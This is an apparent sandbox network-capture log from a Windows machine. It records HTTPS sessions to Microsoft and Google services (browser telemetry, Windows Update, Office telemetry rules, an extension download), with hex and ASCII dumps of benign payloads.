2024-11-10 03:55:10 UTC	1378	IN	Data Raw: 62 2b 39 32 31 36 7d 7d 7d 29 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 22 22 2c 64 3d 30 3b 64 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 76 61 72 20 65 3d 4e 75 6d 62 65 72 28 61 72 67 75 6d 65 6e 74 73 5b 64 5d 29 3b 69 66 28 65 3c 30 7c 7c 65 3e 31 31 31 34 31 31 31 7c 7c 65 21 3d 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 5f 63 6f 64 65 5f 70 6f 69 6e 74 20 22 2b 65 29 3b 65 3c 3d 36 35 35 33 35 3f 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 Data Ascii: b+9216}}});na("String.fromCodePoint",function(a){return a?a:function(b){for(var c="",d=0;d<arguments.length;d++){var e=Number(arguments[d]);if(e<0\|\|e>1114111\|\|e!==Math.floor(e))throw new RangeError("invalid_code_point "+e);e<=65535?c+=String.fromCharCode

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49727	23.32.185.164	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:11 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-10 03:55:11 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF17) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=132671 Date: Sun, 10 Nov 2024 03:55:11 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49728	216.58.206.78	443	7276	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:11 UTC	726	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 913 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: / Origin: chrome-untrusted://new-tab-page X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-10 03:55:11 UTC	913	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 31 32 31 30 39 30 38 36 39 32 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1731210908692",null,null,null,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49731	23.32.185.164	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:12 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-10 03:55:12 UTC	535	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=132562 Date: Sun, 10 Nov 2024 03:55:12 GMT Content-Length: 55 Connection: close X-CID: 2
2024-11-10 03:55:12 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49730	4.175.87.197	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:13 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pdYEopsCsEzHTxO&MD=Cpf3bV6g HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-10 03:55:14 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: cca49e0a-99b5-4594-b7cb-164e8cebe43f MS-RequestId: ec40c1a0-1b37-4299-9228-e0cd5cf092bf MS-CV: ZFwyFS3wy0WivVfP.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sun, 10 Nov 2024 03:55:13 GMT Connection: close Content-Length: 24490
2024-11-10 03:55:14 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-11-10 03:55:14 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49743	94.245.104.56	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:17 UTC	428	OUT	GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1 Host: api.edgeoffer.microsoft.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:17 UTC	725	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Content-Type: application/x-protobuf; charset=utf-8 Date: Sun, 10 Nov 2024 03:55:17 GMT Server: Microsoft-IIS/10.0 Set-Cookie: ARRAffinity=9d90d64458d90255b6b35bbdd301682cde81e2f30fd042245a59b55dae0fc551;Path=/;HttpOnly;Domain=api.edgeoffer.microsoft.com Set-Cookie: ARRAffinity=8b656f4ecf6270dbe9097aac1834960f61903fdb6f6ce3be7cbc242f17e7233a;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com Set-Cookie: ARRAffinitySameSite=8b656f4ecf6270dbe9097aac1834960f61903fdb6f6ce3be7cbc242f17e7233a;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9 X-Powered-By: ASP.NET

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.5	49744	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:17 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:17 UTC	471	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:17 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Fri, 08 Nov 2024 03:28:08 GMT ETag: "0x8DCFFA55D7922DF" x-ms-request-id: 8718d627-b01e-00ab-44bd-31dafd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035517Z-15869dbbcc62nmdhhC1DFW2sxs00000002ng00000000bfh6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:17 UTC	15913	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-11-10 03:55:17 UTC	16384	IN	Data Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
2024-11-10 03:55:17 UTC	16384	IN	Data Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-11-10 03:55:17 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-11-10 03:55:17 UTC	16384	IN	Data Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20 Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
2024-11-10 03:55:17 UTC	16384	IN	Data Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
2024-11-10 03:55:17 UTC	16384	IN	Data Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
2024-11-10 03:55:17 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
2024-11-10 03:55:17 UTC	16384	IN	Data Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-11-10 03:55:17 UTC	16384	IN	Data Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49752	172.217.16.193	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:19 UTC	594	OUT	GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
